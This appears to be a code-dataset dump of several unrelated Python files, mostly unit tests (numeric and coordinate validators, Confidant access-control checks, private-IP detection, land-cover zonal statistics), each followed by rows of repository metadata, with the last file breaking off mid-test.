error_checking.assert_is_geq_numpy_array(POSITIVE_NUMPY_ARRAY, 0)
def test_assert_is_non_negative_numpy_array_positive_with_nan_allowed(self):
"""Checks assert_is_geq_numpy_array; base_value = 0, inputs > 0.
In this case, input array contains NaN's and allow_nan = True.
"""
error_checking.assert_is_geq_numpy_array(
POSITIVE_NUMPY_ARRAY_WITH_NANS, 0, allow_nan=True)
def test_assert_is_non_negative_numpy_array_positive_with_nan_banned(self):
"""Checks assert_is_geq_numpy_array; base_value = 0, inputs > 0.
In this case, input array contains NaN's and allow_nan = False.
"""
with self.assertRaises(ValueError):
error_checking.assert_is_geq_numpy_array(
POSITIVE_NUMPY_ARRAY_WITH_NANS, 0, allow_nan=False)
def test_assert_is_non_negative_numpy_array_non_negative_with_nan_allowed(
self):
"""Checks assert_is_geq_numpy_array; base_value = 0, inputs >= 0.
In this case, input array contains NaN's and allow_nan = True.
"""
error_checking.assert_is_geq_numpy_array(
NON_NEGATIVE_NUMPY_ARRAY_WITH_NANS, 0, allow_nan=True)
def test_assert_is_non_negative_numpy_array_non_negative_with_nan_banned(
self):
"""Checks assert_is_geq_numpy_array; base_value = 0, inputs >= 0.
In this case, input array contains NaN's and allow_nan = False.
"""
with self.assertRaises(ValueError):
error_checking.assert_is_geq_numpy_array(
NON_NEGATIVE_NUMPY_ARRAY_WITH_NANS, 0, allow_nan=False)
def test_assert_is_non_negative_numpy_array_negative(self):
"""Checks assert_is_geq_numpy_array; base_value = 0, inputs < 0."""
with self.assertRaises(ValueError):
error_checking.assert_is_geq_numpy_array(NEGATIVE_NUMPY_ARRAY, 0)
def test_assert_is_non_negative_numpy_array_non_positive(self):
"""Checks assert_is_geq_numpy_array; base_value = 0, inputs <= 0."""
with self.assertRaises(ValueError):
error_checking.assert_is_geq_numpy_array(
NON_POSITIVE_NUMPY_ARRAY, 0)
def test_assert_is_non_negative_numpy_array_mixed_sign(self):
"""assert_is_geq_numpy_array; base_value = 0, inputs mixed sign."""
with self.assertRaises(ValueError):
error_checking.assert_is_geq_numpy_array(MIXED_SIGN_NUMPY_ARRAY, 0)
def test_assert_is_negative_true(self):
"""Checks assert_is_less_than; base_value = 0, input_variable < 0."""
error_checking.assert_is_less_than(SINGLE_NEGATIVE, 0)
def test_assert_is_negative_zero(self):
"""Checks assert_is_less_than; base_value = 0, input_variable = 0."""
with self.assertRaises(ValueError):
error_checking.assert_is_less_than(SINGLE_ZERO, 0)
def test_assert_is_negative_positive(self):
"""Checks assert_is_less_than; base_value = 0, input_variable > 0."""
with self.assertRaises(ValueError):
error_checking.assert_is_less_than(SINGLE_POSITIVE, 0)
def test_assert_is_negative_numpy_array_positive(self):
"""assert_is_less_than_numpy_array; base_value = 0, inputs > 0."""
with self.assertRaises(ValueError):
error_checking.assert_is_less_than_numpy_array(
POSITIVE_NUMPY_ARRAY, 0)
def test_assert_is_negative_numpy_array_non_negative(self):
"""assert_is_less_than_numpy_array; base_value = 0, inputs >= 0."""
with self.assertRaises(ValueError):
error_checking.assert_is_less_than_numpy_array(
NON_NEGATIVE_NUMPY_ARRAY, 0)
def test_assert_is_negative_numpy_array_true(self):
"""assert_is_less_than_numpy_array; base_value = 0, inputs < 0."""
error_checking.assert_is_less_than_numpy_array(NEGATIVE_NUMPY_ARRAY, 0)
def test_assert_is_negative_numpy_array_true_with_nan_allowed(self):
"""Checks assert_is_less_than_numpy_array; base_value = 0, inputs < 0.
In this case, input array contains NaN's and allow_nan = True.
"""
error_checking.assert_is_less_than_numpy_array(
NEGATIVE_NUMPY_ARRAY_WITH_NANS, 0, allow_nan=True)
def test_assert_is_negative_numpy_array_true_with_nan_banned(self):
"""Checks assert_is_less_than_numpy_array; base_value = 0, inputs < 0.
In this case, input array contains NaN's and allow_nan = False.
"""
with self.assertRaises(ValueError):
error_checking.assert_is_less_than_numpy_array(
NEGATIVE_NUMPY_ARRAY_WITH_NANS, 0, allow_nan=False)
def test_assert_is_negative_numpy_array_non_positive(self):
"""assert_is_less_than_numpy_array; base_value = 0, inputs <= 0."""
with self.assertRaises(ValueError):
error_checking.assert_is_less_than_numpy_array(
NON_POSITIVE_NUMPY_ARRAY, 0)
def test_assert_is_negative_numpy_array_mixed_sign(self):
"""assert_is_less_than_numpy_array; base_value = 0, inputs mixed."""
with self.assertRaises(ValueError):
error_checking.assert_is_less_than_numpy_array(
MIXED_SIGN_NUMPY_ARRAY, 0)
def test_assert_is_non_positive_negative(self):
"""Checks assert_is_leq with base_value = 0, input_variable < 0."""
error_checking.assert_is_leq(SINGLE_NEGATIVE, 0)
def test_assert_is_non_positive_zero(self):
"""Checks assert_is_leq with base_value = 0, input_variable = 0."""
error_checking.assert_is_leq(SINGLE_ZERO, 0)
def test_assert_is_non_positive_false(self):
"""Checks assert_is_leq with base_value = 0, input_variable > 0."""
with self.assertRaises(ValueError):
error_checking.assert_is_leq(SINGLE_POSITIVE, 0)
def test_assert_is_non_positive_numpy_array_positive(self):
"""Checks assert_is_leq_numpy_array; base_value = 0, inputs > 0."""
with self.assertRaises(ValueError):
error_checking.assert_is_leq_numpy_array(POSITIVE_NUMPY_ARRAY, 0)
def test_assert_is_non_positive_numpy_array_non_negative(self):
"""Checks assert_is_leq_numpy_array; base_value = 0, inputs >= 0."""
with self.assertRaises(ValueError):
error_checking.assert_is_leq_numpy_array(
NON_NEGATIVE_NUMPY_ARRAY, 0)
def test_assert_is_non_positive_numpy_array_negative(self):
"""Checks assert_is_leq_numpy_array; base_value = 0, inputs < 0."""
error_checking.assert_is_leq_numpy_array(NEGATIVE_NUMPY_ARRAY, 0)
def test_assert_is_non_positive_numpy_array_negative_with_nan_allowed(self):
"""Checks assert_is_leq_numpy_array; base_value = 0, inputs < 0.
In this case, input array contains NaN's and allow_nan = True.
"""
error_checking.assert_is_leq_numpy_array(
NEGATIVE_NUMPY_ARRAY_WITH_NANS, 0, allow_nan=True)
def test_assert_is_non_positive_numpy_array_negative_with_nan_banned(self):
"""Checks assert_is_leq_numpy_array; base_value = 0, inputs < 0.
In this case, input array contains NaN's and allow_nan = False.
"""
with self.assertRaises(ValueError):
error_checking.assert_is_leq_numpy_array(
NEGATIVE_NUMPY_ARRAY_WITH_NANS, 0, allow_nan=False)
def test_assert_is_non_positive_numpy_array_non_positive(self):
"""Checks assert_is_leq_numpy_array; base_value = 0, inputs <= 0."""
error_checking.assert_is_leq_numpy_array(NON_POSITIVE_NUMPY_ARRAY, 0)
def test_assert_is_non_positive_numpy_array_non_positive_with_nan_allowed(
self):
"""Checks assert_is_leq_numpy_array; base_value = 0, inputs <= 0.
In this case, input array contains NaN's and allow_nan = True.
"""
error_checking.assert_is_leq_numpy_array(
NON_POSITIVE_NUMPY_ARRAY_WITH_NANS, 0, allow_nan=True)
def test_assert_is_non_positive_numpy_array_non_positive_with_nan_banned(
self):
"""Checks assert_is_leq_numpy_array; base_value = 0, inputs <= 0.
In this case, input array contains NaN's and allow_nan = False.
"""
with self.assertRaises(ValueError):
error_checking.assert_is_leq_numpy_array(
NON_POSITIVE_NUMPY_ARRAY_WITH_NANS, 0, allow_nan=False)
def test_assert_is_non_positive_numpy_array_mixed_sign(self):
"""assert_is_leq_numpy_array; base_value = 0, inputs mixed sign."""
with self.assertRaises(ValueError):
error_checking.assert_is_leq_numpy_array(MIXED_SIGN_NUMPY_ARRAY, 0)
def test_assert_is_valid_latitude_false(self):
"""Checks assert_is_valid_latitude when latitude is invalid."""
with self.assertRaises(ValueError):
error_checking.assert_is_valid_latitude(SINGLE_LAT_INVALID_DEG)
def test_assert_is_valid_latitude_true(self):
"""Checks assert_is_valid_latitude when latitude is valid."""
error_checking.assert_is_valid_latitude(SINGLE_LATITUDE_DEG)
def test_assert_is_valid_latitude_nan_allowed(self):
"""Checks assert_is_valid_latitude; input = NaN, allow_nan = True."""
error_checking.assert_is_valid_latitude(numpy.nan, allow_nan=True)
def test_assert_is_valid_latitude_nan_not_allowed(self):
"""Checks assert_is_valid_latitude; input = NaN, allow_nan = False."""
with self.assertRaises(ValueError):
error_checking.assert_is_valid_latitude(numpy.nan, allow_nan=False)
def test_assert_is_valid_lat_numpy_array_all_invalid(self):
"""Checks assert_is_valid_lat_numpy_array; all latitudes invalid."""
with self.assertRaises(ValueError):
error_checking.assert_is_valid_lat_numpy_array(
LAT_NUMPY_ARRAY_INVALID_DEG)
def test_assert_is_valid_lat_numpy_array_some_invalid(self):
"""Checks assert_is_valid_lat_numpy_array; some latitudes invalid."""
with self.assertRaises(ValueError):
error_checking.assert_is_valid_lat_numpy_array(
LAT_NUMPY_ARRAY_SOME_INVALID_DEG)
def test_assert_is_valid_lat_numpy_array_true(self):
"""Checks assert_is_valid_lat_numpy_array; all latitudes valid."""
error_checking.assert_is_valid_lat_numpy_array(LAT_NUMPY_ARRAY_DEG)
def test_assert_is_valid_lat_numpy_array_true_with_nan_allowed(self):
"""Checks assert_is_valid_lat_numpy_array; all latitudes valid or NaN.
In this case, allow_nan = True."""
error_checking.assert_is_valid_lat_numpy_array(
LAT_NUMPY_ARRAY_WITH_NANS_DEG, allow_nan=True)
def test_assert_is_valid_lat_numpy_array_true_with_nan_banned(self):
"""Checks assert_is_valid_lat_numpy_array; all latitudes valid or NaN.
In this case, allow_nan = False."""
with self.assertRaises(ValueError):
error_checking.assert_is_valid_lat_numpy_array(
LAT_NUMPY_ARRAY_WITH_NANS_DEG, allow_nan=False)
def test_assert_is_valid_longitude_false(self):
"""Checks assert_is_valid_longitude when longitude is invalid."""
with self.assertRaises(ValueError):
error_checking.assert_is_valid_longitude(SINGLE_LNG_INVALID_DEG)
def test_assert_is_valid_longitude_true(self):
"""Checks assert_is_valid_longitude when longitude is valid."""
error_checking.assert_is_valid_longitude(SINGLE_LONGITUDE_DEG)
def test_assert_is_valid_longitude_positive_in_west_false(self):
"""Checks assert_is_valid_longitude with positive_in_west_flag = True.
In this case, longitude is negative in western hemisphere.
"""
with self.assertRaises(ValueError):
error_checking.assert_is_valid_longitude(
SINGLE_LNG_NEGATIVE_IN_WEST_DEG, positive_in_west_flag=True)
def test_assert_is_valid_longitude_positive_in_west_true(self):
"""Checks assert_is_valid_longitude with positive_in_west_flag = True.
In this case, longitude is positive in western hemisphere.
"""
error_checking.assert_is_valid_longitude(
SINGLE_LNG_POSITIVE_IN_WEST_DEG, positive_in_west_flag=True)
def test_assert_is_valid_longitude_negative_in_west_false(self):
"""Checks assert_is_valid_longitude with negative_in_west_flag = True.
In this case, longitude is positive in western hemisphere.
"""
with self.assertRaises(ValueError):
error_checking.assert_is_valid_longitude(
SINGLE_LNG_POSITIVE_IN_WEST_DEG, negative_in_west_flag=True)
def test_assert_is_valid_longitude_negative_in_west_true(self):
"""Checks assert_is_valid_longitude with negative_in_west_flag = True.
In this case, longitude is negative in western hemisphere.
"""
error_checking.assert_is_valid_longitude(
SINGLE_LNG_NEGATIVE_IN_WEST_DEG, negative_in_west_flag=True)
def test_assert_is_valid_lng_numpy_array_all_invalid(self):
"""Checks assert_is_valid_lng_numpy_array; all longitudes invalid."""
with self.assertRaises(ValueError):
error_checking.assert_is_valid_lng_numpy_array(
LNG_NUMPY_ARRAY_INVALID_DEG)
def test_assert_is_valid_lng_numpy_array_some_invalid(self):
"""Checks assert_is_valid_lng_numpy_array; some longitudes invalid."""
with self.assertRaises(ValueError):
error_checking.assert_is_valid_lng_numpy_array(
LNG_NUMPY_ARRAY_SOME_INVALID_DEG)
def test_assert_is_valid_lng_numpy_array_true(self):
"""Checks assert_is_valid_lng_numpy_array; all longitudes valid."""
error_checking.assert_is_valid_lng_numpy_array(LNG_NUMPY_ARRAY_DEG)
def test_assert_is_valid_lng_numpy_array_positive_in_west_false(self):
"""Checks assert_is_valid_lng_numpy_array; positive_in_west_flag = True.
In this case, longitudes in western hemisphere are negative.
"""
with self.assertRaises(ValueError):
error_checking.assert_is_valid_lng_numpy_array(
LNG_NUMPY_ARRAY_NEGATIVE_IN_WEST_DEG,
positive_in_west_flag=True)
def test_assert_is_valid_lng_numpy_array_positive_in_west_true(self):
"""Checks assert_is_valid_lng_numpy_array; positive_in_west_flag = True.
In this case, longitudes in western hemisphere are positive.
"""
error_checking.assert_is_valid_lng_numpy_array(
LNG_NUMPY_ARRAY_POSITIVE_IN_WEST_DEG, positive_in_west_flag=True)
def test_assert_is_valid_lng_numpy_array_negative_in_west_false(self):
"""Checks assert_is_valid_lng_numpy_array; negative_in_west_flag = True.
In this case, longitudes in western hemisphere are positive.
"""
with self.assertRaises(ValueError):
error_checking.assert_is_valid_lng_numpy_array(
LNG_NUMPY_ARRAY_POSITIVE_IN_WEST_DEG,
negative_in_west_flag=True)
def test_assert_is_valid_lng_numpy_array_negative_in_west_true(self):
"""Checks assert_is_valid_lng_numpy_array; negative_in_west_flag = True.
In this case, longitudes in western hemisphere are negative.
"""
error_checking.assert_is_valid_lng_numpy_array(
LNG_NUMPY_ARRAY_NEGATIVE_IN_WEST_DEG, negative_in_west_flag=True)
if __name__ == '__main__':
unittest.main()
| 39.728188 | 80 | 0.65356 | 5,895 | 47,356 | 4.780322 | 0.034266 | 0.12264 | 0.071505 | 0.07665 | 0.950745 | 0.922214 | 0.870866 | 0.814514 | 0.727821 | 0.644677 | 0 | 0.020633 | 0.263113 | 47,356 | 1,191 | 81 | 39.761545 | 0.78691 | 0.219845 | 0 | 0.377953 | 0 | 0 | 0.001622 | 0 | 0 | 0 | 0 | 0 | 0.644094 | 1 | 0.244094 | false | 0 | 0.007874 | 0 | 0.253543 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
c1571424ea613accfbfe9fb9f10ec399bde03164 | 192 | py | Python | platform/radio/efr32_multiphy_configurator/pyradioconfig/parts/margay/phys/Phys_Internal_WiSUN.py | PascalGuenther/gecko_sdk | 2e82050dc8823c9fe0e8908c1b2666fb83056230 | [
"Zlib"
] | 69 | 2021-12-16T01:34:09.000Z | 2022-03-31T08:27:39.000Z | platform/radio/efr32_multiphy_configurator/pyradioconfig/parts/margay/phys/Phys_Internal_WiSUN.py | PascalGuenther/gecko_sdk | 2e82050dc8823c9fe0e8908c1b2666fb83056230 | [
"Zlib"
] | 6 | 2022-01-12T18:22:08.000Z | 2022-03-25T10:19:27.000Z | platform/radio/efr32_multiphy_configurator/pyradioconfig/parts/margay/phys/Phys_Internal_WiSUN.py | PascalGuenther/gecko_sdk | 2e82050dc8823c9fe0e8908c1b2666fb83056230 | [
"Zlib"
] | 21 | 2021-12-20T09:05:45.000Z | 2022-03-28T02:52:28.000Z | from pyradioconfig.parts.ocelot.phys.Phys_Internal_WiSUN import PHYS_Internal_WiSUN_Ocelot
class PHYS_Internal_WiSUN_Margay(PHYS_Internal_WiSUN_Ocelot):
#Inherit all from Ocelot
pass | 32 | 90 | 0.854167 | 27 | 192 | 5.666667 | 0.481481 | 0.313725 | 0.444444 | 0.300654 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.104167 | 192 | 6 | 91 | 32 | 0.889535 | 0.119792 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.333333 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 8 |
c16c660267cc75901291803a3421159a6b2696eb | 4,678 | py | Python | tests/unit/confidant/authnz/rbac_test.py | chadwhitacre/confidant | dd788147b355f760767cf3b9487671c67948ade3 | [
"Apache-2.0"
] | 1,820 | 2015-11-04T17:57:16.000Z | 2022-03-31T16:47:24.000Z | tests/unit/confidant/authnz/rbac_test.py | chadwhitacre/confidant | dd788147b355f760767cf3b9487671c67948ade3 | [
"Apache-2.0"
] | 186 | 2015-11-04T18:21:52.000Z | 2022-01-14T20:31:31.000Z | tests/unit/confidant/authnz/rbac_test.py | isabella232/confidant | 3dac318c3e1f29bae5771084ad29a4bc121f1771 | [
"Apache-2.0"
] | 136 | 2015-11-04T19:23:14.000Z | 2022-02-25T01:51:29.000Z | from confidant.app import create_app
from confidant.authnz import rbac
def test_default_acl(mocker):
mocker.patch('confidant.settings.USE_AUTH', True)
app = create_app()
with app.test_request_context('/fake'):
g_mock = mocker.patch('confidant.authnz.g')
# Test for user type is user
g_mock.user_type = 'user'
assert rbac.default_acl(resource_type='service') is True
assert rbac.default_acl(resource_type='certificate') is False
# Test for user type is service, but not an allowed resource type
g_mock.user_type = 'service'
g_mock.username = 'test-service'
assert rbac.default_acl(
resource_type='service',
action='update',
resource_id='test-service'
) is False
# Test for user type is service, and an allowed resource, with metadata
# action, but service name doesn't match
g_mock.username = 'bad-service'
assert rbac.default_acl(
resource_type='service',
action='metadata',
resource_id='test-service',
) is False
# Test for user type is service, and an allowed resource, with metadata
# action
g_mock.username = 'test-service'
assert rbac.default_acl(
resource_type='service',
action='metadata',
resource_id='test-service',
) is True
# Test for user type is service, and an allowed resource, with get
# action
assert rbac.default_acl(
resource_type='service',
action='get',
resource_id='test-service',
) is True
# Test for user type is service, with certificate resource and get
# action, with a CN that doesn't match the name pattern
assert rbac.default_acl(
resource_type='certificate',
action='get',
# missing domain name...
resource_id='test-service',
kwargs={'ca': 'development'},
) is False
# Test for user type is service, with certificate resource and get
# action, with a valid CN
assert rbac.default_acl(
resource_type='certificate',
action='get',
resource_id='test-service.example.com',
kwargs={'ca': 'development'},
) is True
# Test for user type is service, with certificate resource and get
# action, with a valid CN, and valid SAN values
assert rbac.default_acl(
resource_type='certificate',
action='get',
resource_id='test-service.example.com',
kwargs={
'ca': 'development',
'san': [
'test-service.internal.example.com',
'test-service.external.example.com',
],
},
) is True
# Test for user type is service, with certificate resource and get
# action, with an invalid CN
assert rbac.default_acl(
resource_type='certificate',
action='get',
resource_id='bad-service.example.com',
kwargs={'ca': 'development'},
) is False
# Test for user type is service, with certificate resource and get
# action, with a valid CN, but an invalid SAN
assert rbac.default_acl(
resource_type='certificate',
action='get',
resource_id='test-service.example.com',
kwargs={
'ca': 'development',
'san': ['bad-service.example.com'],
},
) is False
# Test for user type is service, with certificate resource and get
# action, with a valid CN, but a mix of valid and invalid SAN values
assert rbac.default_acl(
resource_type='certificate',
action='get',
resource_id='test-service.example.com',
kwargs={
'ca': 'development',
'san': [
'bad-service.example.com',
'test-service.example.com',
],
},
) is False
# Test for user type is service, and an allowed resource, with
# disallowed fake action
assert rbac.default_acl(resource_type='service', action='fake') is False
# Test for bad user type
g_mock.user_type = 'badtype'
assert rbac.default_acl(resource_type='service', action='get') is False
def test_no_acl():
app = create_app()
with app.test_request_context('/fake'):
assert rbac.no_acl(resource_type='service', action='update') is True
| 38.344262 | 80 | 0.572681 | 540 | 4,678 | 4.846296 | 0.131481 | 0.048911 | 0.085976 | 0.106993 | 0.800535 | 0.781047 | 0.765762 | 0.727933 | 0.716087 | 0.60642 | 0 | 0 | 0.332835 | 4,678 | 121 | 81 | 38.661157 | 0.838513 | 0.241556 | 0 | 0.717391 | 0 | 0 | 0.19841 | 0.080045 | 0 | 0 | 0 | 0 | 0.163043 | 1 | 0.021739 | false | 0 | 0.021739 | 0 | 0.043478 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
c1e8324ef9932e75139975c144077f30eb1e5edf | 1,780 | py | Python | ietf/dbtemplate/migrations/0007_adjust_review_assigned.py | hassanakbar4/ietfdb | cabee059092ae776015410640226064331c293b7 | [
"BSD-3-Clause"
] | 25 | 2022-03-05T08:26:52.000Z | 2022-03-30T15:45:42.000Z | ietf/dbtemplate/migrations/0007_adjust_review_assigned.py | hassanakbar4/ietfdb | cabee059092ae776015410640226064331c293b7 | [
"BSD-3-Clause"
] | 219 | 2022-03-04T17:29:12.000Z | 2022-03-31T21:16:14.000Z | ietf/dbtemplate/migrations/0007_adjust_review_assigned.py | hassanakbar4/ietfdb | cabee059092ae776015410640226064331c293b7 | [
"BSD-3-Clause"
] | 22 | 2022-03-04T15:34:34.000Z | 2022-03-28T13:30:59.000Z | # Copyright The IETF Trust 2019-2020, All Rights Reserved
# -*- coding: utf-8 -*-
# Generated by Django 1.11.26 on 2019-11-19 11:47
from django.db import migrations
def forward(apps, schema_editor):
DBTemplate = apps.get_model('dbtemplate','DBTemplate')
qs = DBTemplate.objects.filter(path='/group/defaults/email/review_assigned.txt')
qs.update(content="""{{ assigner.ascii }} has assigned {{ reviewer.person.ascii }} as a reviewer for this document.
{% if prev_team_reviews %}This team has completed other reviews of this document:{% endif %}{% for assignment in prev_team_reviews %}
- {{ assignment.completed_on }} {{ assignment.reviewer.person.ascii }} -{% if assignment.reviewed_rev %}{{ assignment.reviewed_rev }}{% else %}{{ assignment.review_request.requested_rev }}{% endif %} {{ assignment.result.name }}
{% endfor %}
""")
qs.update(title="Default template for review assignment email")
def reverse(apps, schema_editor):
DBTemplate = apps.get_model('dbtemplate','DBTemplate')
qs = DBTemplate.objects.filter(path='/group/defaults/email/review_assigned.txt')
qs.update(content="""{{ assigner.ascii }} has assigned you as a reviewer for this document.
{% if prev_team_reviews %}This team has completed other reviews of this document:{% endif %}{% for assignment in prev_team_reviews %}
- {{ assignment.completed_on }} {{ assignment.reviewer.person.ascii }} -{% if assignment.reviewed_rev %}{{ assignment.reviewed_rev }}{% else %}{{ assignment.review_request.requested_rev }}{% endif %} {{ assignment.result.name }}
{% endfor %}
""")
class Migration(migrations.Migration):
dependencies = [
('dbtemplate', '0006_add_review_assigned_template'),
]
operations = [
migrations.RunPython(forward, reverse)
]
| 45.641026 | 230 | 0.711798 | 218 | 1,780 | 5.683486 | 0.389908 | 0.038741 | 0.048426 | 0.041969 | 0.724778 | 0.724778 | 0.724778 | 0.724778 | 0.724778 | 0.724778 | 0 | 0.019659 | 0.142697 | 1,780 | 38 | 231 | 46.842105 | 0.792267 | 0.070225 | 0 | 0.48 | 1 | 0.2 | 0.686251 | 0.278619 | 0 | 0 | 0 | 0 | 0 | 1 | 0.08 | false | 0 | 0.04 | 0 | 0.24 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
e732b213a90ee4d761fc843371eb7c25a5758b25 | 1,578 | py | Python | tests/test_helper_network.py | manageacloud/manageacloud-cli | 1b7d9d5239f9e51f97d0377d223db0f58ca0ca7c | [
"MIT"
] | 6 | 2015-09-21T09:02:04.000Z | 2017-02-08T23:40:18.000Z | tests/test_helper_network.py | manageacloud/manageacloud-cli | 1b7d9d5239f9e51f97d0377d223db0f58ca0ca7c | [
"MIT"
] | 3 | 2015-11-03T01:44:29.000Z | 2016-03-25T08:36:15.000Z | tests/test_helper_network.py | manageacloud/manageacloud-cli | 1b7d9d5239f9e51f97d0377d223db0f58ca0ca7c | [
"MIT"
] | 4 | 2015-07-06T01:46:13.000Z | 2019-01-10T23:08:19.000Z | import unittest
from tests.mock_data import *
import maccli.helper.network
class AuthTestCase(unittest.TestCase):
def test_network(self):
self.assertTrue(maccli.helper.network.is_ip_private("127.0.0.1"))
self.assertTrue(maccli.helper.network.is_ip_private("192.168.0.1"))
self.assertFalse(maccli.helper.network.is_ip_private("162.243.152.74"))
self.assertTrue(maccli.helper.network.is_ip_private("10.10.10.10"))
self.assertFalse(maccli.helper.network.is_ip_private("172.2.1.2"))
self.assertTrue(maccli.helper.network.is_ip_private("172.16.1.2"))
self.assertTrue(maccli.helper.network.is_ip_private("172.30.1.2"))
self.assertTrue(maccli.helper.network.is_ip_private("172.31.1.2"))
self.assertTrue(maccli.helper.network.is_ip_private("172.31.36.70"))
self.assertFalse(maccli.helper.network.is_ip_private("172.32.1.2"))
def test_local_loop(self):
self.assertTrue(maccli.helper.network.is_local("127.0.0.1"))
self.assertFalse(maccli.helper.network.is_local("192.168.0.1"))
self.assertFalse(maccli.helper.network.is_local("162.243.152.74"))
self.assertFalse(maccli.helper.network.is_local("10.10.10.10"))
self.assertFalse(maccli.helper.network.is_local("172.2.1.2"))
self.assertFalse(maccli.helper.network.is_local("172.16.1.2"))
self.assertFalse(maccli.helper.network.is_local("172.30.1.2"))
self.assertFalse(maccli.helper.network.is_local("172.31.1.2"))
self.assertFalse(maccli.helper.network.is_local("172.32.1.2"))
| 52.6 | 79 | 0.709759 | 243 | 1,578 | 4.473251 | 0.164609 | 0.220791 | 0.349586 | 0.367065 | 0.873965 | 0.828887 | 0.828887 | 0.75161 | 0.614535 | 0.515179 | 0 | 0.103548 | 0.124842 | 1,578 | 29 | 80 | 54.413793 | 0.683563 | 0 | 0 | 0 | 0 | 0 | 0.126743 | 0 | 0 | 0 | 0 | 0 | 0.76 | 1 | 0.08 | false | 0 | 0.12 | 0 | 0.24 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
e73b91dd34d5e6b02262862a535e92a4bdb4b955 | 7,524 | py | Python | tests/test_wps_nalcms_zonal_stats.py | fossabot/raven | b5ed6258a4c09ac4d132873d6b8b4a1d82d2131b | [
"MIT"
] | 29 | 2018-08-13T20:16:41.000Z | 2022-03-17T02:31:38.000Z | tests/test_wps_nalcms_zonal_stats.py | fossabot/raven | b5ed6258a4c09ac4d132873d6b8b4a1d82d2131b | [
"MIT"
] | 359 | 2018-05-31T00:37:53.000Z | 2022-03-26T04:35:43.000Z | tests/test_wps_nalcms_zonal_stats.py | fossabot/raven | b5ed6258a4c09ac4d132873d6b8b4a1d82d2131b | [
"MIT"
] | 10 | 2019-06-17T18:07:46.000Z | 2022-02-15T02:01:32.000Z | import json
import pytest
from metalink import download as md
from pywps import Service
from pywps.tests import assert_response_success
from ravenpy.utilities.testdata import get_local_testdata
from shapely.geometry import MultiPolygon
from raven.processes import (
NALCMSZonalStatisticsProcess,
NALCMSZonalStatisticsRasterProcess,
)
from .common import CFG_FILE, client_for, count_pixels, get_output
class TestNALCMSZonalStatsProcess:
def test_simplified_categories(self):
client = client_for(
Service(processes=[NALCMSZonalStatisticsProcess()], cfgfiles=CFG_FILE)
)
fields = [
"select_all_touching={touches}",
"simple_categories={simple_categories}",
"band={band}",
"shape=file@xlink:href=file://{shape}",
"raster=file@xlink:href=file://{raster}",
]
datainputs = ";".join(fields).format(
touches=True,
simple_categories=True,
band=1,
shape=get_local_testdata("donneesqc_mrc_poly/mrc_subset.gml"),
raster=get_local_testdata("cec_nalcms2010_30m/cec_nalcms_subQC.tiff"),
)
resp = client.get(
service="WPS",
request="Execute",
version="1.0.0",
identifier="nalcms-zonal-stats",
datainputs=datainputs,
)
assert_response_success(resp)
out = get_output(resp.xml)
stats = json.loads(out["statistics"])[0]
assert not {"count", "nodata", "nan"}.issubset(stats)
geometry = json.loads(out["features"])
assert isinstance(type(geometry), type(MultiPolygon))
category_counts = count_pixels(stats)
assert category_counts == geometry["features"][0]["properties"]["count"]
assert sum(stats.values()) == geometry["features"][0]["properties"]["count"]
def test_true_categories(self):
client = client_for(
Service(
processes=[
NALCMSZonalStatisticsProcess(),
],
cfgfiles=CFG_FILE,
)
)
fields = [
"select_all_touching={touches}",
"simple_categories={simple_categories}",
"band={band}",
"shape=file@xlink:href=file://{shape}",
"raster=file@xlink:href=file://{raster}",
]
datainputs = ";".join(fields).format(
touches=True,
simple_categories=False,
band=1,
shape=get_local_testdata("donneesqc_mrc_poly/mrc_subset.gml"),
raster=get_local_testdata("cec_nalcms2010_30m/cec_nalcms_subQC.tiff"),
)
resp = client.get(
service="WPS",
request="Execute",
version="1.0.0",
identifier="nalcms-zonal-stats",
datainputs=datainputs,
)
assert_response_success(resp)
out = get_output(resp.xml)
stats = json.loads(out["statistics"])[0]
assert not {"count", "nodata", "nan"}.issubset(stats)
geometry = json.loads(out["features"])
assert isinstance(type(geometry), type(MultiPolygon))
category_counts = count_pixels(stats)
assert category_counts == geometry["features"][0]["properties"]["count"]
assert sum(stats.values()) == geometry["features"][0]["properties"]["count"]
def test_wcs_simplified_categories(self):
client = client_for(
Service(processes=[NALCMSZonalStatisticsProcess()], cfgfiles=CFG_FILE)
)
fields = [
"select_all_touching={touches}",
"simple_categories={simple_categories}",
"band={band}",
"shape=file@xlink:href=file://{shape}",
]
datainputs = ";".join(fields).format(
touches=True,
simple_categories=True,
band=1,
shape=get_local_testdata("watershed_vector/Basin_test.zip"),
)
resp = client.get(
service="WPS",
request="Execute",
version="1.0.0",
identifier="nalcms-zonal-stats",
datainputs=datainputs,
)
assert_response_success(resp)
out = get_output(resp.xml)
stats = json.loads(out["statistics"])[0]
assert not {"count", "nodata", "nan"}.issubset(stats)
geometry = json.loads(out["features"])
assert isinstance(type(geometry), type(MultiPolygon))
